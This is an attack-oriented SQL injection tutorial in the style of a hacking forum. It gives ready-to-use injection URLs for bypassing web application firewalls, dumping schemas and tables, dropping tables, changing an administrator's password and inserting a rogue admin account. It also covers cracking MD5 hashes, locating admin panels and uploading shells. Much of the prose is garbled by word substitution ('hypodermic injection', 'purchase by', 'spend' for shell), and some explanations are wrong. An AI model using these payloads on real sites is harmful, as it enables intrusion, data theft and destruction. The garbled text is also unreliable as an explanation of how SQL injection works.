SQL Injection Tutorial: All common SQL injection problems and Solutions



    These days I'll create an guide for you what includes most issues while doing SQL hypodermic injection and alternatives to them. Probably every individual who has considered guides to crack a web page have observed that there are too much SQL guides. Almost every community has 10 guides and weblogs 5 guides aboutSQL hypodermic injection, but actually those guides are thieved from somewhere else and the writer doesn't probably even know why does SQL hypodermic injection perform. All of those guides are like guides with their ABC's and the outcome is just a blunder. Everyone are composing guides about SQL, but nobody includes the issues what will come with that strike.

What is the cause of most issues relevant to SQL injection?

Webdevelopers aren't always really foolish and they have also observed of online hackers and have applied some safety actions like WAF or guide protetion. WAF is an Web program firewall program and will prevent all malicous demands, but WAF's are quite simple to avoid. Nobody would like to have their website compromised and they are also applying some protection, but ofcourse it would be incorrect to say that if we fall short then it's the web servers mistake. There's also a large probability that we're treating otherwise than we should.

A web program firewall program (WAF) is an equipment, hosting server plug-in, or narrow that is applicable a set of guidelines to an HTTP discussion. Usually, these guidelines protect typical strikes such as Cross-site Scripting (XSS) and SQL Hypodermic injection. By modifying the guidelines to your program, many strikes can be determined and obstructed. The attempt to execute this personalization can be important and needs to be managed as the program is customized.

If you're fascinated about WAF's and how they're operating then I recommend to study it from wikipedia http://en.wikipedia.org/wiki/Application_firewall 


Order by is being blocked?

It hardly ever happens, but sometimes you can't use purchase by because the WAF has obstructed it or some other factors. Unfortunally we can't miss the transaction by and we have to discover another way. The way is simple, instead of using Order by we have to use Team by because that's very unlikely to beblacklisted by the WAF.

If that demand will come back 'forbidden' then it indicates it's obstructed.
http://site.com/gallery?id=1 order by 100--
Then you have to try to use Group by and it will return correct :
http://site.com/gallery?id=1 group by 100-- / success
Still there's an possibility that WAF will block the request, but there's on other way also and that's not very widely known. It's about using ( the main query ) = (select 1)
http://example.org/news.php?id=8 and (select * from admins)=(select 1)
Then you'll probably recive one like this : Operand should contain 5 column(s).

That mistake indicates there are 5 content and it indicates we can continue to our next phase what's partnership choose. The control was different than regular, but the further hypodermic injection will be the same.
http://site.com/news.php?id=-8 union select 1,2,3,4,5--

'order by 10000' and still not error?

That's an little section where I'll tell you why sometimes purchase by won't perform and you don't see one. The distinction between this capther and the last one is that formerly your demands were obstructed by the WAF, but here's the hypodermic injection technique is just a littlebit different. When I saw that on my new then I believed how does a Data source have 100000 content because I'm not getting the mistake while the website is vulnerable?

The response is quite sensible. By trying purchase by 1000000 we're not getting the mistake because there are so many content in there, we're not getting the mistake because our treating isn't operating.

Example : site.com/news.php?id=9 order by 10000000000-- [No Error]
to bypass this you just have to change the URL littlebit.Add ' after the ID number and at the end just enter +

Example : 
site.com/news.php?id=9' order by 10000000--+[Error]
If the last example is working for you then it means you have to use it in the next steps also, there isn't anything complicated, but to make everything clear I'll still make an example.

http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+

Getting details from other details source.

Sometimes we can provide succesfully and there doesn't appear any mistake, it's just like a online hackers desire. That desire will end at this time when we'll see that there doesn't are available anything useful to us. There are only few platforms and are known as "News", "gallery" and "articles". They aren't useful at all to us because we'd like to see platforms like "Admin" or "Administrator". Still we know that the hosting server probably has several directories and even if we have discovered the details we're looking for, you should still take a look in the other directories also.

This provides you with Schema titles.
site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

And with this code you can get the tables from the schema.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x

This code will give you the column names.
site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x

I get error if I try to extract tables.


site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables

Le wild Error appears.
"you have an error in your sql syntax near '' at line 1"
Change the URL for this
site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1--


How to bypass WAF/Web application firewall

The biggest reason why most of reasons are appearing are because of security measures added to the server and WAF is the biggest reason, but mostly they're made really badly and can be bypassed really easily. Mostly you will get error 404 like it's in the code below, this is WAF. Most likely persons who're into SQL injection and bypassing WAF's are thinking at the moment "Dude, only one bypassing method?", but in this case we both know that bypassing WAF's is different kind of science and I could write a ebook on bypassing these. I'll keep all those bypassing queries to another time and won't cover that this time.

"404 forbidden you do not have permission to access to this webpage"

The code will look like this if you get the error
http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5--
[Error]

Change the url Like it's below.
http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--
[No error]

Is it possible to alter the details in the data source by SQL injection?

Most of individuals aren't conscious of it, but it's possible. You're able to Upgrade, Fall, place and choose details. Most of individuals who are working with SQL hypodermic injection has never seemed further in the strike than proven in the common SQL hypodermic injection guide, but a typical SQL hypodermic injection guide doesn't have those claims included. Most likely because most of individuals are copy&pasting guides or just overwriting them. You might ask that why should one update, drop or place details into the data source if I can just look into the details to use the present ones, why should we create another Manager consideration if there already prevails one?

Reading the details is just one aspect of the hypodermic injection and sometimes those other orders what are quite notorious are more highly effective than we believed. If you have study all those avalible SQL injectiontutorials then you're probably conscious that study the details, but you didn't realized you're able to alter it. If you have tried SQL treating then you have probably experienced some issues that there aren't administrator consideration, why not to use the Insert control to add one? There aren't administration web page to sign in, why not to go the desk and all details so nobody could accessibility it? I want to get rid of the present Manager and can't modify his security password, why not to use the update orders to modify the security password of the Administrator?

You have probably observed that I have discussed a lot about unneccesary details what you probably don't need to know, but that's an details you need to comprehend and comprehend to become a actual cyberpunk because you have to comprehend how SQL directories will work to fiqure it out how those orders will work because you can't discover guides about it from the system. It's just like mathematical you comprehend in university, if you won't comprehend it then you'll be in issues when you develop.

Theory is almost over and now let's get to the exercise.

http://site.com/news.php?id=1


You have to start injecting to look at the tables and columns in them, but let's assume that the current table is named as "News".
With SQL injection you can SELECT, DROP, UPDATE and INSERT information to the database. The SELECT is probably already covered at all the tutorials so let's focus on the other three. Let's start with the DROP command.

I'd like to get rid of a table, how to do it? 

http://site.com/news.php?id=1; DROP TABLE news

That seems easy, we have just dropped the table. I'd explain what we did in the above statement, but it's quite hard to explain it because you all can understand the above command. Unfortunally most of 'hackers' who're making tutorials on SQL injection aren't aware of it and sometimes that three words are more important than all the information we can read on some tutorials.

Let's head to the next statement what's UPDATE. 
http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' = 'new data' WHERE column_name='information'--

Above explanation might be quite confusing so I'll add an query what you're most likely going to use in real life : 

http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'--

We have just updated Administrator account's password.In the above example we updated the column called 'admin_login" and added a password what is "Crackhackforum" and that credentials belongs to account which's username is Rynaldo. Kinda heavy to explain, but I hope you'll understand.


How does INSERT work?


Luckily "INSERT" isn't that easy as the "DROP" statement is, but still quite understandable. Let's go further with Administrator privileges because that's what most of people are heading to. Adding an administrator account would be like this : 
http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (2,'Rynaldo','Crackhackforum','NA')--

INSERT INTO 'admin_login' indicates that we're placing something to 'admin_login'. Now we have to provide guidelines to the data resource what actual information we want to add, ('login_id', 'login_name', 'password', 'details') indicates that the requirements we're including to the DB are Login_id, Login_name, protection password and information and those are information the data resource needs to create a new consideration. So far we have informed the data resource what information we want to add, we want to add new consideration, protection password to it, consideration ID and information. Now we have to tell the data resource what will be the new account's sign in name, it's protection password and consideration ID, VALUES (2,'Rynaldo','Crackhackforum','NA')-- . That indicates consideration ID is 2, sign in name will be Rynaldo, protection password of the consideration will be Crackhackforum. Your new consideration has been included to the data resource and all you have to do is starting up the Manager web page and sign in. 

Passwords aren't working

Sometimes the website is susceptible to SQL and you can get the protection passwords.Then you will get the sites information, but when you get into it into adminpanel then it reveals "Wrong password".This can be because those protection passwords are there, but aren't operating. This is created by website's administration to befuddle you and actually the Cpanel doesn't contain any username/password. Sometimes are records eliminated, but the records are still in the data resource. Sometimes it isn't created by the administration and those qualifications has been remaining in the data resource after eliminating the sign in web page, sometimes the actual qualifications has been funneled to another data resource and old records hasn't been eliminated.

Sometimes i get some strange password

This strange protection password is known as Hash and most likely it's MD5 hash.That indicates the sites administration has included more protection to the web page and has secured the protection passwords.Most well-known crypting way is using MD5 hash.The best way to break MD5 hashes is using PasswordsPro or Hashcat because they're the best and can break the protection password even if it's really difficult or isn't MD5. Also you can use http://md5decrypter.com .I don't like to be a individual who's throwing around with little information what aren't appropriate, but here's an tip what you should keep in thoughts. The sector is saying it's "md5decryptor" what reffers to decrypting MD5 hashes. Actually it's not possible to decrypt a hash because they're having 'one-way' protection. One way protection indicates it can only be secured, but not decrypted. Still it doesn't mean that we can't know what does the hash mean, we have to break it. Hashes can't be decrypted, only damaged. Those sites aren't breaking hashes whenever, they're preserving already damaged hashes & outcomes to their data resource and if you'll ask an hash what's already in their data resource, you will get the outcome. :)

Md5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345
You can study about all Hashes what are available and their information http://pastebin.com/aiyxhQsf
Md5 hashes can't be decrypted, only cracked

How to discover administration web page of site?


Some sites doesn't contain administration cpanel so you can use any means for discovering the administration web page, but that doesn't even are available. You might ask "I got information from the data resource, why isn't there any administration sign in web page then?", but sometimes they are just remaining in the data resource after eliminating the Cpanel.

Mostly individuals are using resources known as "Admin web page finders".They have some particular record of webpages and will try them.If the website will provide HTTP reaction 200 then it indicates the website prevails, but if the hosting server reacts with HTTP reaction 404 then it indicates the website doesn't are available in there.If the website are available what is in the record then device will say "Page found".I don't have any device to discuss presently, but if you're installing it yourself then be be careful because there are most of those resources contaminated with virus's.

Mostly the resources I described above, Admin Page Locators doesn't usually get the administrator web page if it's costumly created or relabeled. That indicates quite oftenly those resources doesn't help us out and we have to use an substitute and I think the best one is by using website spiders. Most of you are probably having Acunetix Web Weeknesses reader 8 and it has one amazing function known as website spider. It'll explain to you all the webpages on the website and will %100 get the sign in web page if you can find one in the website.


Automated SQL hypodermic injection resources.

Automated SQL hypodermic injection resources are applications what will do the whole perform for you, sometimes they will even break the hashes and will get the Manager web page for you. Most of individuals are using computerized SQL hypodermic injection resources and most well-known of them are Havij and SQLmap. Havij is being used much more than SQLmap nomatter the other device is much better for that hypodermic injection. The sad fact why that's so is that many individuals aren't even able to run SQLmap and those individuals are known as script-kiddies. Being a script-kiddie is the worstest factor you can be in the coughing globe and if you won't understand how to execute the strike personally and are only using resources then you're one of them. If you're using those resources to execute the strike then most of individuals will think that you're a script-kiddie because most likely you are. Proffesionals won't take you seriusly if you're treating with them and you won't become a actual cyberpunk neither. My above written text might provide you with an query, "But I've seen that even Proffesional on the internet hackers are using SQLmap?" and I'd like to say that everything isn't always dark & white-colored. If there are 10 directories, 50 platforms in them and 100 content in the desk then it would just take times to proccess all that information.I'm also sometimes using computerized resources because it creates my lifestyle simpler, but to use those resources you first have to understand how to use those resources personally and that's what the guide above is training you.

Use computerized resources only to create simpler, but don't even look at them if you don't know how to execute the strike personally.

What else can I do with SQL hypodermic injection besides getting information?

There are many factors besides getting information from the data resource and sometimes they are much more highly effective. We have discussed above that sometimes the data resource doesn't contain Administrator's qualifications or you can't break the hashes. Then all the hypodermic injection seems useless because we can't use information we have got from the data resource. Still we can use few another techniques. Just like we can perform CSRF strike with chronic XSS, we can also shift to another strikes through SQL hypodermic injection. One of the remedy would be doing DOS strike on the web page which is susceptible to SQL hypodermic injection. DOS is reduced from Refusal of assistance and it's tottaly different from DDOS what's Allocated Refusal of Service. I think that you all probably know what these are, but if I'm getting that strike up with a phrase then DOS will allow us to take down the web page temporarely so customers wouldn't have accessibility the website. The other way would be posting our spend through SQL hypodermic injection. If you're having a query about what's spend then by saying it soon, it's a program what we'll publish to the hosting server and it will create an entry for us and will provide us all the privileges to do what we'd like in the hosting server and sometimes by posting a spend you're having more privileges to alter factors than the actual Manager has. After you have submitted a spend you can progress to symlink what indicates we can deface all the sites what are discussing the same hosting server. Putting the web page is probably most highly effective factor you can use on the web page. I have not protected how to publish a spend through SQL hypodermic injection and haven't protected how to cause DOS neither, but probably will do in my next guides because posting a spend through SQL is another type of technology, just like skipping WAF's. Those are the most anxiousness what assailants will put in use after they can't get anything useful out of the data resource. Ofcourse every web page doesn't have the same weaknesses and they aren't replying always like we want and by that I mean we can't execute those strikes on all sites.We have all observed that immagination is endless and you can do whatever you'd like. That's type of real and coughing isn't an exemption, there are more methods than I can depend. 

What to do if all information doesn't display on the page?
I actually have really hardly ever seen that there are so much information on the web site that it all just don't fit in there, but one individual lately requested that query from me and I made the decision to add it here. Also if you're having concerns then absolutely ask and I'll upgrade the content. If we're getting returning to the query then the response is easy, if all information can't fit in the display then you have to look at the resource value because everything shown on the web site will be in there. Also sometimes information will appear in the tab where usually is the website's name. If you can't see information then sometimes it's hiddened, but with getting a further look you might discover it from the resource. That's why you always have to look all the alternatives out before quiting because sometimes you might think "I can't provide into that..", but actually the response is hiddened in the resource.

What is the objective of '--' in the union+select+1,2,3,4,5-- ?
I recommend to study about null-byte's and here's a excellent description about it : http://en.wikipedia.org/wiki/Null_character because it might provide you with some sign why -- is being used . Goal of including -- in the end of the URL isn't always neccesary and it relies on the focus on. It doesn't have any impact to the hypodermic injection because it doesn't mean anything, but it's still being used because it's used as end of question. It indicates if I'm treating as : http://site.com/news.php?id=-1 partnership choose 1,2,3,4,5-- asasdasd then the hosting server will miss everything after -- and asasdasd won't be readed. It's just like including to covering up a spend. Sometimes hypodermic injection isn't operating if -- is losing because -- informs the DB that "I'm the end of question, don't study anything what comes after me and perform everything infront of me". It's just like composing a phrase without a dot, individuals might think it's not the end of your phrase and will hang on until you create the other aspect of the phrase and the end will come if you add the dot to your phrase.